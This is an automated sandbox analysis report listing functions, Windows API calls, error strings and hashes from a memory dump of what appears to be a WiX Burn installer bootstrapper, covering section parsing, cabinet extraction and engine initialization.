Failed to read complete image section header, index: %u, xrefs: 00B7BB75
Failed to read section info, unsupported version: %08x, xrefs: 00B7B9F5
(, xrefs: 00B7B81D
Failed to open handle to engine process path., xrefs: 00B7B52D
Failed to find valid DOS image header in buffer., xrefs: 00B7BBEB
Failed to allocate buffer for section info., xrefs: 00B7B8E4
Failed to seek past optional headers., xrefs: 00B7B7EB
Failed to allocate memory for container sizes., xrefs: 00B7BAD3

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
API String ID: 3411815225-695169583
Opcode ID: 82f12d0fdfa5b60b70794a6ed689985239c0ce165445664c2610cecc066764f8
Instruction ID: 8062407bc424f5ac9774bbb63113d6c97f9d40c1272a26e20b3ca98115ff2150
Opcode Fuzzy Hash: 82f12d0fdfa5b60b70794a6ed689985239c0ce165445664c2610cecc066764f8
Instruction Fuzzy Hash: 4612A576940225ABDB209A548C86FFA76E4EB04B10F1181E5FE2CBB291D7B4DD409FD1

Function 00B90D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,?,00B908BC,?,?), ref: 00B90D25
GetLastError.KERNEL32(?,?,?,?,00B908BC,?,?), ref: 00B90D2F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,00B908BC,?,?), ref: 00B90D74
GetLastError.KERNEL32(?,?,?,?,00B908BC,?,?), ref: 00B90D7F
ResetEvent.KERNEL32(?,?,?,?,?,00B908BC,?,?), ref: 00B90DB7
GetLastError.KERNEL32(?,?,?,?,00B908BC,?,?), ref: 00B90DC1

Strings

Failed to create file: %ls, xrefs: 00B91001
cabextract.cpp, xrefs: 00B90D53, 00B90DA3, 00B90DE5, 00B90E11, 00B90E94, 00B90EDC, 00B90F21, 00B90F89, 00B90FF4, 00B91045, 00B9108A, 00B910CE
Failed to reset begin operation event., xrefs: 00B90DEF, 00B90F2B
Failed to wait for begin operation event., xrefs: 00B90DAD, 00B90EE6
Failed to set file pointer to beginning of file., xrefs: 00B910D8
Invalid operation for this state., xrefs: 00B90E1D
Failed to set operation complete event., xrefs: 00B90D5D, 00B90E9E
Failed to copy stream name: %ls, xrefs: 00B90E50
Failed to set file pointer to end of file., xrefs: 00B9104F
Failed to set end of file., xrefs: 00B91094
Failed to allocate buffer for stream., xrefs: 00B90F93

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$Event$ObjectResetSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 1865021742-2104912459
Opcode ID: 1d34ca7652b7105a9a63a014ca2c67f49db2918b24ccddae1ccf07639a81039c
Instruction ID: 27c1fdecd231757d9ca702e1cedde5bc574e108eb4c8287e9be8a7f09101ccf8
Opcode Fuzzy Hash: 1d34ca7652b7105a9a63a014ca2c67f49db2918b24ccddae1ccf07639a81039c
Instruction Fuzzy Hash: 6A910B37A916376BDF3126A95D8AF2A79D0EF00B20F1186F5BE14BB6D0D7A19C0092D1

Function 00B75195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B75217

Part of subcall function 00BB04F8: InitializeCriticalSection.KERNEL32(00BDB5FC,?,00B75223,00000000,?,?,?,?,?,?), ref: 00BB050F

Part of subcall function 00B7120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00B7523F,00000000,?), ref: 00B71248
Part of subcall function 00B7120A: GetLastError.KERNEL32(?,?,?,00B7523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00B71252

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00B75285

Part of subcall function 00BB0E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00BB0E28

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00B75317
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00B75321
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B7558E

Strings

Failed to initialize core., xrefs: 00B753C3
Failed to initialize Regutil., xrefs: 00B752C9
Invalid run mode., xrefs: 00B753F9
Failed to initialize Wiutil., xrefs: 00B752E1
engine.cpp, xrefs: 00B75345
Failed to initialize XML util., xrefs: 00B752F9
3.11.1.2318, xrefs: 00B75384
Failed to parse command line., xrefs: 00B75245
Failed to run per-machine mode., xrefs: 00B7546C
Failed to run untrusted mode., xrefs: 00B754B6
Failed to initialize Cryputil., xrefs: 00B752A6
Failed to run embedded mode., xrefs: 00B75444
Failed to run per-user mode., xrefs: 00B75494
Failed to get OS info., xrefs: 00B7534F
Failed to initialize engine state., xrefs: 00B7526C
Failed to initialize COM., xrefs: 00B75291
Failed to run RunOnce mode., xrefs: 00B7541C

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
API String ID: 3262001429-510904028
Opcode ID: 919d9779e7ca9a47144f3b24589a8cf671057e8cf69c24f3a0d7b37d44a6cf2c
Instruction ID: c57840b58637cf84702e67516c3db241d6b6ee88e6996c15a7c747cb4b3bb3c7
Opcode Fuzzy Hash: 919d9779e7ca9a47144f3b24589a8cf671057e8cf69c24f3a0d7b37d44a6cf2c
Instruction Fuzzy Hash: 44B1A372D40A299BDB31AB64CC86BFD76F5AF04711F0481E5E91CB6251DBF09E80CB91

Function 00B8752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WixBundleSourceProcessPath, xrefs: 00B876F8
Failed to initialize variables., xrefs: 00B87571
WixBundleSourceProcessFolder, xrefs: 00B87734
Failed to get unique temporary folder for bootstrapper application., xrefs: 00B877CE
Failed to set source process folder variable., xrefs: 00B87745
Failed to open attached UX container., xrefs: 00B8758E
WixBundleUILevel, xrefs: 00B876D6, 00B876E7
Failed to load manifest., xrefs: 00B875E8
Failed to parse command line., xrefs: 00B87667
Failed to get source process folder from path., xrefs: 00B87725
Failed to load catalog files., xrefs: 00B8780F
WixBundleOriginalSource, xrefs: 00B87759
Failed to open manifest stream., xrefs: 00B875AB
Failed to initialize internal cache functionality., xrefs: 00B8779F
WixBundleElevated, xrefs: 00B876A5, 00B876B6
Failed to set source process path variable., xrefs: 00B87709
Failed to extract bootstrapper application payloads., xrefs: 00B877EF
Failed to set original source variable., xrefs: 00B8776A
Failed to get manifest stream from container., xrefs: 00B875CC
Failed to overwrite the %ls built-in variable., xrefs: 00B876BB

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
API String ID: 32694325-1564579409
Opcode ID: f40a68d2b7eb807e124114180a0dd30a328bb127ab59202b050d2579dad109f7
Instruction ID: 2121f0ab048746e3dbc185f5e020ef7f05da9e2fd640bedf99e02c7a0df0fe7a
Opcode Fuzzy Hash: f40a68d2b7eb807e124114180a0dd30a328bb127ab59202b050d2579dad109f7
Instruction Fuzzy Hash: C4A17672E84616BBDB12AAA4CC85FEAB7ECBB14704F1041E6F515E7161DB70EA04C7A0

Function 00B7762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00B8756B,00B753BD,00000000,00B75445), ref: 00B7764C

Strings

WixBundleExecutePackageCacheFolder, xrefs: 00B77D98
WixBundleSourceProcessPath, xrefs: 00B77E8E
WixBundleForcedRestartPackage, xrefs: 00B77E14
WixBundleTag, xrefs: 00B77EAE
InstallerName, xrefs: 00B77812
WixBundleSourceProcessFolder, xrefs: 00B77E9E
Date, xrefs: 00B77770
InstallerVersion, xrefs: 00B77833
WixBundleUILevel, xrefs: 00B77EBE
$, xrefs: 00B77D49
WixBundleInstalled, xrefs: 00B77E2A
WixBundleVersion, xrefs: 00B77ECE
WixBundleActiveParent, xrefs: 00B77E62
#, xrefs: 00B776CB
0, xrefs: 00B77663
WixBundleExecutePackageAction, xrefs: 00B77DF8
Failed to add built-in variable: %ls., xrefs: 00B77F19
WixBundleElevated, xrefs: 00B77E46
', xrefs: 00B778EB
WixBundleProviderKey, xrefs: 00B77E7E
LogonUser, xrefs: 00B77882
WixBundleAction, xrefs: 00B77D76

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
API String ID: 32694325-3635313340
Opcode ID: f16f1dd4a74d7393e2824a1f59505f320c8fb84b31c44af2fc7a48ad16566232
Instruction ID: 92b0db2ddf55985732d77f3f06c3fa08ab33bb70bc3bc7b1ce6d51ea4633e1b2
Opcode Fuzzy Hash: f16f1dd4a74d7393e2824a1f59505f320c8fb84b31c44af2fc7a48ad16566232
Instruction Fuzzy Hash: 9A3237B1C116299BDB65CF5AC9887DDFBF4BB48304F9081EED25CBA211C7B00A888F55

Function 00B882BA Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00B75489), ref: 00B88310

Part of subcall function 00BB0879: OpenProcessToken.ADVAPI32(?,00000008,?,00B753BD,00000000,?,?,?,?,?,?,?,00B8769D,00000000), ref: 00BB0897
Part of subcall function 00BB0879: GetLastError.KERNEL32(?,?,?,?,?,?,?,00B8769D,00000000), ref: 00BB08A1
Part of subcall function 00BB0879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00B8769D,00000000), ref: 00BB092B

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00B88336
GetLastError.KERNEL32 ref: 00B88340
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 00B883BD
GetLastError.KERNEL32 ref: 00B883C7
UuidCreate.RPCRT4(?), ref: 00B88406

Strings

Failed to create working folder guid., xrefs: 00B88413
%ls%ls\, xrefs: 00B88458
Temp\, xrefs: 00B88395
Failed to append bundle id on to temp path for working folder., xrefs: 00B88470
Failed to copy working folder path., xrefs: 00B8848B
cache.cpp, xrefs: 00B88364, 00B883EB, 00B8843C
Failed to get windows path for working folder., xrefs: 00B8836E
Failed to get temp path for working folder., xrefs: 00B883F5
Failed to ensure windows path for working folder ended in backslash., xrefs: 00B8838B
4Wu, xrefs: 00B883BD
Failed to convert working folder guid into string., xrefs: 00B88446
Failed to concat Temp directory on windows path for working folder., xrefs: 00B883AD

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
String ID: 4Wu$%ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 266130487-571614469
Opcode ID: 67f5427c955c2144b45932fb6ac064986ee74422a9c76f2f012eec759875fcf4
Instruction ID: c31a6269fd6834bafc034a676c03617ee06c286163f50da04c229be1a5f8591d
Opcode Fuzzy Hash: 67f5427c955c2144b45932fb6ac064986ee74422a9c76f2f012eec759875fcf4
Instruction Fuzzy Hash: 4941DC73A41325B7D730B6A49C89FAA73E89B04B10F5541E5BA08F7260EEB4DD04C7D5

Function 00B910FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 00B9111D
CoUninitialize.COMBASE ref: 00B91398

Strings

cabextract.cpp, xrefs: 00B91193, 00B912BA, 00B91307, 00B91346, 00B91372
Failed to initialize cabinet.dll., xrefs: 00B9119F
Failed to reset begin operation event., xrefs: 00B91350
Failed to wait for begin operation event., xrefs: 00B91311
Failed to extract all files from container, erf: %d:%X:%d, xrefs: 00B91279
Invalid operation for this state., xrefs: 00B9137C
Failed to set operation complete event., xrefs: 00B912C4
<the>.cab, xrefs: 00B911BD
Failed to initialize COM., xrefs: 00B91129

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-1168358783
Opcode ID: 817303a3cfbfbb5884ae8f8fef65a8e6ed5324f340fb9ed2afec20a0a6241277
Instruction ID: cb7b789258ddc8ddc772b6b2a86bebd8463a9b917a715969579d5b6b23e15f0f
Opcode Fuzzy Hash: 817303a3cfbfbb5884ae8f8fef65a8e6ed5324f340fb9ed2afec20a0a6241277
Instruction Fuzzy Hash: CA514D36A44163E78F20779C4C85EBF76E4DB0176072247F9BD11FB2A0D6A49D00B6E5

Function 00B742D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00B75266,?,?,00000000,?,?), ref: 00B74303
InitializeCriticalSection.KERNEL32(000000D0,?,?,00B75266,?,?,00000000,?,?), ref: 00B7430C
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00B75266,?,?,00000000,?,?), ref: 00B74352
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00B75266,?,?,00000000,?,?), ref: 00B7435C
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00B75266,?,?,00000000,?,?), ref: 00B74370
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00B75266,?,?,00000000,?,?), ref: 00B74380
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00B75266,?,?,00000000,?,?), ref: 00B743D0
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00B75266,?,?,00000000,?,?), ref: 00B743DA
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00B75266,?,?,00000000,?,?), ref: 00B743EE
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00B75266,?,?,00000000,?,?), ref: 00B743FE

Strings

burn.filehandle.self, xrefs: 00B743CB, 00B743D3, 00B743D8, 00B743D9, 00B743F9, 00B744CB
Failed to initialize engine section., xrefs: 00B74467
burn.filehandle.attached, xrefs: 00B7434D, 00B74355, 00B7435A, 00B7435B, 00B7437B, 00B7449F
engine.cpp, xrefs: 00B74495, 00B744C1
Failed to parse file handle: '%ls', xrefs: 00B74482
Missing required parameter for switch: %ls, xrefs: 00B744A4

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
API String ID: 3039292287-3209860532
Opcode ID: 1f080d1f36bdf870a0fcdcbb54d4b48953003f2e0f1724f831ad2d8ea7bfbbcf
Instruction ID: c9dd7b6c54e5513676478b6950874cb758ad534a0fa3820a96bc2ff635d0463e
Opcode Fuzzy Hash: 1f080d1f36bdf870a0fcdcbb54d4b48953003f2e0f1724f831ad2d8ea7bfbbcf
Instruction Fuzzy Hash: E3519971A40215BFCB24DB68DC86FAA77ECEF04761F104195F629E7290DBF0A950CBA4

Function 00B8E7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsSetValue.KERNEL32(?,?), ref: 00B8E7FF
RegisterClassW.USER32(?), ref: 00B8E82B
GetLastError.KERNEL32 ref: 00B8E836
CreateWindowExW.USER32(00000080,00BC9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 00B8E89D
GetLastError.KERNEL32 ref: 00B8E8A7
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 00B8E945

Strings

WixBurnMessageWindow, xrefs: 00B8E824, 00B8E940
Unexpected return value from message pump., xrefs: 00B8E930
Failed to create window., xrefs: 00B8E8D5
uithread.cpp, xrefs: 00B8E85A, 00B8E8CB
Failed to register window., xrefs: 00B8E864

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: ea721ce23636f8418cf2084ccdde32594c47c7c3f9983a27151521afb0cf510e
Instruction ID: 28c27426d8bbdf23676ab37a6dbde764c74d7d3962d69bb029dfdc6edba50445
Opcode Fuzzy Hash: ea721ce23636f8418cf2084ccdde32594c47c7c3f9983a27151521afb0cf510e
Instruction Fuzzy Hash: 42419572900215ABDB20ABA5DC48FDEBFF8EF04750F1041A5F925B7160DBB0D940CBA5

Function 00B7C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,00B7C47F,00B75405,?,?,00B75445), ref: 00B7C2D6
GetLastError.KERNEL32(?,00B7C47F,00B75405,?,?,00B75445,00B75445,00000000,?,00000000), ref: 00B7C2E7
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,00B7C47F,00B75405,?,?,00B75445,00B75445,00000000,?), ref: 00B7C336
GetCurrentProcess.KERNEL32(000000FF,00000000,?,00B7C47F,00B75405,?,?,00B75445,00B75445,00000000,?,00000000), ref: 00B7C33C
DuplicateHandle.KERNELBASE(00000000,?,00B7C47F,00B75405,?,?,00B75445,00B75445,00000000,?,00000000), ref: 00B7C33F
GetLastError.KERNEL32(?,00B7C47F,00B75405,?,?,00B75445,00B75445,00000000,?,00000000), ref: 00B7C349
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00B7C47F,00B75405,?,?,00B75445,00B75445,00000000,?,00000000), ref: 00B7C39B
GetLastError.KERNEL32(?,00B7C47F,00B75405,?,?,00B75445,00B75445,00000000,?,00000000), ref: 00B7C3A5

Strings

feclient.dll, xrefs: 00B7C398
container.cpp, xrefs: 00B7C30B, 00B7C36D, 00B7C3C9
Failed to move file pointer to container offset., xrefs: 00B7C3D3
Failed to duplicate handle to container: %ls, xrefs: 00B7C37A
crypt32.dll, xrefs: 00B7C397
Failed to open file: %ls, xrefs: 00B7C318
Failed to open container., xrefs: 00B7C3F1

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: 0383b35e53ba1a33979001c866957cefdbfe5f7fd3b4d410b8f3f2873c50965a
Instruction ID: 621597b5022f06d35f5d9d5335a34eb78a61a403e78ff533137b9301c41eb217
Opcode Fuzzy Hash: 0383b35e53ba1a33979001c866957cefdbfe5f7fd3b4d410b8f3f2873c50965a
Instruction Fuzzy Hash: 4141CD76540202ABDB209F199C45E6B7FE5EBC4720F12C59DFD28EB291DBB1C801DB64

Function 00BB2AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B73838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00B73877
Part of subcall function 00B73838: GetLastError.KERNEL32 ref: 00B73881

Part of subcall function 00BB4A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00BB4A9D

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00BB2B41
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00BB2B61
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00BB2B81
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00BB2BA1
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00BB2BC1
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00BB2BE1
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00BB2C01

Strings

MsiDeterminePatchSequenceW, xrefs: 00BB2B36
MsiSetExternalUIRecord, xrefs: 00BB2BD6
Msi.dll, xrefs: 00BB2B09
MsiGetProductInfoExW, xrefs: 00BB2BB6
MsiSourceListAddSourceExW, xrefs: 00BB2BF6
MsiDetermineApplicablePatchesW, xrefs: 00BB2B56
MsiGetPatchInfoExW, xrefs: 00BB2B96
MsiEnumProductsExW, xrefs: 00BB2B76

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

